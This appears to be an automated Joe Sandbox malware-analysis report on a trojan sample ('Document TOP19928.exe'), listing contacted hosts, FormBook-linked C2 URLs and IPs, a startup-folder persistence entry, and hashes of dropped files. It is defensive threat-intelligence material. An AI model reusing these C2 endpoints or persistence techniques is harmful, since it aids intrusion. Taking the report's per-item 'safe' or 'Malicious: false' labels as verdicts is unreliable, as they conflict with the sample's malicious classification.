https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000005.00000002.4478683134.00000000048C2000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000039E2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://musee.mobi/vivaldi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAs	netbtugc.exe, 00000005.00000002.4478683134.000000000427A000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.000000000339A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	false
34.120.249.181	www.660danm.top	United States	15169	GOOGLEUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
202.172.28.202	www.kasegitai.tokyo	Japan	37907	DIGIROCKDigiRockIncJP	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
104.206.198.212	www.shenzhoucui.com	United States	62904	EONIX-COMMUNICATIONS-ASBLOCK-62904US	false
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
194.58.112.174	www.b301.space	Russian Federation	197695	AS-REGRU	false
46.30.213.191	www.antonio-vivaldi.mobi	Denmark	51468	ONECOMDK	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1462990
Start date and time:	2024-06-26 14:54:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Document TOP19928.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@14/11@16/13
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 62 Number of non-executed functions: 276
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target HAeLffQrBWbBcOffDKoNxdCPr.exe, PID 5840 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:55:45	API Interceptor	12877242x Sleep call for process: netbtugc.exe modified
14:54:58	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/?xVY=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&Nz=LPhpDRap3
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	5fG4r07BPy.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	eGHWPCyhLI.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Z1glGeDwjL.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	9KBARIRa8X.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/?aZ=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&qD=FrMTb
	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
116.50.37.244	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	5fG4r07BPy.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	eGHWPCyhLI.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	Z1glGeDwjL.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	9KBARIRa8X.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=
	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	www.goldenjade-travel.com/fo8o/
23.227.38.74	eiqj38BeRo.rtf	Get hash	malicious	FormBook	Browse	www.hotnerdsg.com/btrd/?OR-TJfQ=QYM4bgJyspzVGYCiPdJuLP8OPAYI3JlFsPRnMnrB+ay/1C+1E5NddrFh+bXFREaOGU+/vg==&2dc=kvXd-rKHCF
	98790ytt.exe	Get hash	malicious	FormBook	Browse	www.k1l1b1.top/h5g5/?GHo=XnPbVpjN/8HfOp3rDocXbvIxNNdkm7UU97aTvyFkmvlSq9aR/gBP64yEqoJUhBip7UXXi/rbrVtHq2jCdN+WCRZJC/gyhFCbJVLxADgJjqZ5z2Nfpz2WUMVLMnNvBp4aqfwtpYg=&i2=tZJdhrYHabWX4H
	60a8.scr.exe	Get hash	malicious	FormBook	Browse	www.xbavju.top/5v8s/
	HSBC Payment Advice.img.exe	Get hash	malicious	FormBook	Browse	www.hbkzle.shop/mw62/?hbMlVFRH=3zgkOQ0clCWzDF6XmXmn2Igdh0w887pgRYcyNkXCRRuhig4DGsfFLVWwszzPFnnvJaltXAaNqw==&Elr=gdm42bE8RhIx
	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/?xVY=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThujZncl+tVTqRpQa58ob5uovzcVfw==&Nz=LPhpDRap3
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	Yemenittiskes.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.shootprecious.com/a8pp/
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	5fG4r07BPy.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	U prilogu lista novih narudzbi.exe	Get hash	malicious	DBatLoader, FormBook	Browse	85.159.66.93
	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	85.159.66.93
	Yemenittiskes.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	5fG4r07BPy.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	eGHWPCyhLI.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Z1glGeDwjL.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	9KBARIRa8X.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.kasegitai.tokyo	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	202.172.28.202
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	5fG4r07BPy.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	eGHWPCyhLI.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	Z1glGeDwjL.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	9KBARIRa8X.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	13820099132-PHOTO.lnk	Get hash	malicious	FormBook	Browse	202.172.28.202
shops.myshopify.com	eiqj38BeRo.rtf	Get hash	malicious	FormBook	Browse	23.227.38.74
	Order-1351125X.docx.doc	Get hash	malicious	FormBook	Browse	23.227.38.74
	http://outselluar.live	Get hash	malicious	Unknown	Browse	23.227.38.74
	DHL ARRIVAL DOCUMENTS.pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	98790ytt.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	PAGO BANORTE 6142024pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	60a8.scr.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	HSBC Payment Advice.img.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Employee May performance report.vbs	Get hash	malicious	FormBook, GuLoader	Browse	23.227.38.74
	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DONGFONG-TWDongFongTechnologyCoLtdTW	s8y4CBbFHW.elf	Get hash	malicious	Mirai	Browse	101.0.241.188
	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	116.50.37.244
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	5fG4r07BPy.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	eGHWPCyhLI.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Z1glGeDwjL.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	9KBARIRa8X.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
CIZGITR	U prilogu lista novih narudzbi.exe	Get hash	malicious	DBatLoader, FormBook	Browse	85.159.66.93
	PAYMENT SLIP.com.exe	Get hash	malicious	AgentTesla	Browse	94.73.188.44
	hdBLUdo056.exe	Get hash	malicious	FormBook	Browse	94.73.151.78
	fiY5fTkFKk.rtf	Get hash	malicious	FormBook	Browse	94.73.151.78
	tEBdYCAxQC.rtf	Get hash	malicious	FormBook	Browse	94.73.151.78
	COTA#U00c7#U00c3O para fornecedores em branco - termometro digital.exe	Get hash	malicious	AgentTesla	Browse	94.73.188.44
	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	85.159.66.93
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
DIGIROCKDigiRockIncJP	https://pikara-campaign.com/st-manager/click/track?id=300&type=classic&url=https://melaminafatima.com/antibot%23Aminor%2Bccfi.com&source_url=https%3A%2F%2Fpikara-campaign.com%2Fnext%2F&source_title=%E3%83%94%E3%82%AB%E3%83%A9%E5%85%89%E3%81%AD%E3%81%A3%E3%81%A8%20%E3%81%8A%E3%81%99%E3%81%99%E3%82%81%20%E4%BB%A3%E7%90%86%E5%BA%97%E3%80%8C%E6%A0%AA%E5%BC%8F%E4%BC%9A%E7%A4%BENEXT%E3%80%8D%E3%81%AE%E3%82%AD%E3%83%A3%E3%83%83%E3%82%B7%E3%83%A5%E3%83%90%E3%83%83%E3%82%AF%E3%82%AD%E3%83%A3%E3%83%B3%E3%83%9A%E3%83%BC%E3%83%B3%EF%BC%BB%E6%9C%80%E6%96%B0%E6%83%85%E5%A0%B1%3A%202024%E5%B9%B46%E6%9C%883%E6%97%A5%28%E6%9C%88%29%EF%BC%BD	Get hash	malicious	HTMLPhisher	Browse	183.90.181.102
	scanned file.exe	Get hash	malicious	FormBook	Browse	202.172.25.9
	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	202.172.28.202
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	5fG4r07BPy.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	eGHWPCyhLI.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	Z1glGeDwjL.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
	9KBARIRa8X.exe	Get hash	malicious	FormBook	Browse	202.172.28.202
SEDO-ASDE	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	qoe1X4ig0N.exe	Get hash	malicious	LummaC, AsyncRAT, DarkTortilla, LummaC Stealer, Njrat, SmokeLoader, StormKitty	Browse	91.195.240.101
	eiqj38BeRo.rtf	Get hash	malicious	FormBook	Browse	91.195.240.19
	z873JUsjG7.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	91.195.240.101
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Fiyat BKBambalaj 03.04.2024 - VAT TR-24-0286_ unit Siparis.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Ziraat Bankasi Swift Mesaji.pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	5684251ebd9215951f23648ead7b419c6bf0829c3e3aab30ff27ed2bcf8604a5_dump.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	91.195.240.101
	Urgent Quotation_pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.123
	IMG56758938583095883593858835Blindehjemmet.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
CLOUDFLARENETUS	Purchase Order 0030520574.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://ma1k0.nairgen.com/CdlD92vC/	Get hash	malicious	HTMLPhisher	Browse	172.67.177.112
	Die Frau sa#U00df starr und in sich gekehrt..eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://e.trustifi.com/#/fff3a0/31514b/3bc40e/bf63b0/0f1e4a/45c562/f49390/c6eb48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838079/c061d0/829ff5/edf804/7547c0/95deac/f71901/a35145/3fdfba/f78512/1f8823/67dbf6/90b1f0/c31599/dc7154/8d4865/9c696c/7c0241/ad3154/63784a/690579/63374d/aad803/83ebe2/01f4b6/3024c6/957b5a/b4df4e/bb8ae8/3b56c3/922d2b/c45221/2d2f93/514207/ff58af/c52f28/edce6e/691492/8e178a/10aaf0/e6d1c0/075684/56fb74/dff554/976a6b/f87618/5f7c2a/f4cc58/02876e/4c5743/50c98a/81ef24/2c01e2/e7b8ea/7efe45/4d8562/a2da42/7323ee/880f98/d6c82f/0d4453/a1a74f/45e964/a9e9a6/ba901b/8974f3/250aa3/b318de/8ee8c8/1977d8/5ae7a0/79f768/a4cf93/1c7010/4d3c04/5f1f8b	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://ogusukuebley.com.br/web/fotos/thumbnails/web1/	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://arub3322.page.link/mVFa	Get hash	malicious	Unknown	Browse	1.1.1.1
	Prouduct list Specifictions.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	44f773a-PlayVM_Now010-CabinetworksgroupCOINC.htm	Get hash	malicious	Phisher	Browse	104.21.11.123
	Cargo details.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://www.qxlogistix.com	Get hash	malicious	Unknown	Browse	104.21.20.89

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut9C75.tmp

Download File

Process:	C:\Users\user\Desktop\Document TOP19928.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.993965996174853
Encrypted:	true
SSDEEP:	6144:KU3g3tFofWt0fbRs0xFxC2g9HZDmQaRT5OYHNB:utFaWCFxehCFbtB
MD5:	FECCB4610CCE73E905531D9AF57586D0
SHA1:	386D190E3B557FC1D868A3838B4DBD8D21F59DA4
SHA-256:	D1D26CFBBF413C9CF6E963E4E981292C6DC90439CE5A9CDB8320D313B7128554
SHA-512:	9B660950902C6ECA10F3E681622D08DD175A1B551158C5FDF986F552F11D463A3C3EEAB1A3A642BC42A3C992B22671954FA86778A6923444D86B393C06C2C7E4
Malicious:	false
Reputation:	low
Preview:	yku..UAXVi..L....S6...V;...V10DEZRDXCZS53410U3UAXV10DEZRD.CZS;,.?0.:.`.W}.e.2;7x3(<RAU\.6R;/7".R!e('x4sq\|g.]:W0oU[;.DEZRDXC#R<..QW..5&.kQW._...b#=./....5T.[....$"..-;+g3R.410U3UAX.t0D.[SD.+..53410U3U.XT0;ENZRT\CZS53410U.@AXV!0DEzVDXC.S5#410W3UGXV10DEZTDXCZS534.4U3WAXV10DGZ..XCJS5#410U#UAHV10DEZBDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZ\|0=;.S53.>4U3EAXV!4DEJRDXCZS53410U3UaXVQ0DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV1

C:\Users\user\AppData\Local\Temp\aut9CA5.tmp

Download File

Process:	C:\Users\user\Desktop\Document TOP19928.exe
File Type:	data
Category:	dropped
Size (bytes):	9844
Entropy (8bit):	7.599742378321997
Encrypted:	false
SSDEEP:	192:6ZxWQa8J2TwDz0kOZ1KDS0Cg1KjfAhG4ffnMHSoZQU/rvQ:6Zx3a8kw1DSv4Zfn0tbc
MD5:	4B7E1DCC3CC5A5343F752A8D9925273C
SHA1:	51D6E810DCB96012FA521E3957C01A0B71C02143
SHA-256:	6318DE88570797F7807698349DB7B586888383C7D4483E434945735C504504D8
SHA-512:	0F66ED9CCA00065A63F1ED95C22AF3DB52D84D7B74E4A73ADA2B1FC5AFDF8D90527597CC57758D57BF2BA0CB4D4878F4EBBAB96358DEA9136CC9A7EB55727561
Malicious:	false
Reputation:	low
Preview:	EA06..pT..h.I..D.P..)..q1..htZ..g6.M.SY..mD.Mf.y..e2..&3y..9.M.....9..4i...4...9..8.P.T:4.1.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9\|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u\| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4\|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R.r"p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b

C:\Users\user\AppData\Local\Temp\aut9FD0.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.993965996174853
Encrypted:	true
SSDEEP:	6144:KU3g3tFofWt0fbRs0xFxC2g9HZDmQaRT5OYHNB:utFaWCFxehCFbtB
MD5:	FECCB4610CCE73E905531D9AF57586D0
SHA1:	386D190E3B557FC1D868A3838B4DBD8D21F59DA4
SHA-256:	D1D26CFBBF413C9CF6E963E4E981292C6DC90439CE5A9CDB8320D313B7128554
SHA-512:	9B660950902C6ECA10F3E681622D08DD175A1B551158C5FDF986F552F11D463A3C3EEAB1A3A642BC42A3C992B22671954FA86778A6923444D86B393C06C2C7E4
Malicious:	false
Reputation:	low
Preview:	yku..UAXVi..L....S6...V;...V10DEZRDXCZS53410U3UAXV10DEZRD.CZS;,.?0.:.`.W}.e.2;7x3(<RAU\.6R;/7".R!e('x4sq\|g.]:W0oU[;.DEZRDXC#R<..QW..5&.kQW._...b#=./....5T.[....$"..-;+g3R.410U3UAX.t0D.[SD.+..53410U3U.XT0;ENZRT\CZS53410U.@AXV!0DEzVDXC.S5#410W3UGXV10DEZTDXCZS534.4U3WAXV10DGZ..XCJS5#410U#UAHV10DEZBDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZ\|0=;.S53.>4U3EAXV!4DEJRDXCZS53410U3UaXVQ0DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV10DEZRDXCZS53410U3UAXV1

C:\Users\user\AppData\Local\Temp\autA000.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9844
Entropy (8bit):	7.599742378321997
Encrypted:	false
SSDEEP:	192:6ZxWQa8J2TwDz0kOZ1KDS0Cg1KjfAhG4ffnMHSoZQU/rvQ:6Zx3a8kw1DSv4Zfn0tbc
MD5:	4B7E1DCC3CC5A5343F752A8D9925273C
SHA1:	51D6E810DCB96012FA521E3957C01A0B71C02143
SHA-256:	6318DE88570797F7807698349DB7B586888383C7D4483E434945735C504504D8
SHA-512:	0F66ED9CCA00065A63F1ED95C22AF3DB52D84D7B74E4A73ADA2B1FC5AFDF8D90527597CC57758D57BF2BA0CB4D4878F4EBBAB96358DEA9136CC9A7EB55727561
Malicious:	false
Reputation:	low
Preview:	EA06..pT..h.I..D.P..)..q1..htZ..g6.M.SY..mD.Mf.y..e2..&3y..9.M.....9..4i...4...9..8.P.T:4.1.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9\|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u\| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4\|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R.r"p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b

C:\Users\user\AppData\Local\Temp\autD75B.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.993965996174853
Encrypted:	true
SSDEEP:	6144:KU3g3tFofWt0fbRs0xFxC2g9HZDmQaRT5OYHNB:utFaWCFxehCFbtB
MD5:	FECCB4610CCE73E905531D9AF57586D0
SHA1:	386D190E3B557FC1D868A3838B4DBD8D21F59DA4
SHA-256:	D1D26CFBBF413C9CF6E963E4E981292C6DC90439CE5A9CDB8320D313B7128554
SHA-512:	9B660950902C6ECA10F3E681622D08DD175A1B551158C5FDF986F552F11D463A3C3EEAB1A3A642BC42A3C992B22671954FA86778A6923444D86B393C06C2C7E4
Malicious:	false
